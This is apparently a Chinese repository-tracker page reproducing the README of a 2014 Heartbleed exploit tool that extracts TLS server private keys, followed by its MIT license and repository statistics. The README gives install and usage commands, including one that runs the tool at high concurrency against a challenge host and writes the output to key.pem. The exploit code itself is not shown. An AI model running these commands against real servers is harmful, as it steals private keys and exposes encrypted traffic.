heartbleed

Extracting server private key using Heartbleed OpenSSL vulnerability.

Github星跟踪图

Heartbleed

Extracting server private key using Heartbleed OpenSSL vulnerability.

NOTE: Pointing this tool at other people's servers is illegal in most countries.

How to use

$ npm install -g heartbleed.js
$ heartbleed
Options:
  --host         [required]
  --port         [default: 443]
  --concurrency  [default: 1]

Missing required arguments: host

$ heartbleed -h cloudflarechallenge.com -c 1000 >> key.pem

Protip, use cheap ciphers:

heartbleed -h cloudflarechallenge.com -c 1000 --ciphers="AES128-SHA" >> key.pem

LICENSE

This software is licensed under the MIT License.

Copyright Fedor Indutny, 2014.

Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to permit
persons to whom the Software is furnished to do so, subject to the
following conditions:

The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
USE OR OTHER DEALINGS IN THE SOFTWARE.

主要指标

概览
名称与所有者indutny/heartbleed
主编程语言C++
编程语言Python (语言数: 3)
平台
许可证
所有者活动
创建于2014-04-15 16:55:58
推送于2014-11-28 22:18:43
最后一次提交2014-11-28 22:18:43
发布数12
最新版本名称v0.2.7 (发布于 2014-04-24 23:58:30)
第一版名称v0.1.0 (发布于 2014-04-15 17:13:10)
用户参与
星数394
关注者数18
派生数43
提交数36
已启用问题?
问题数7
打开的问题数0
拉请求数1
打开的拉请求数0
关闭的拉请求数0
项目设置
已启用Wiki?
已存档?
是复刻?
已锁定?
是镜像?
是私有?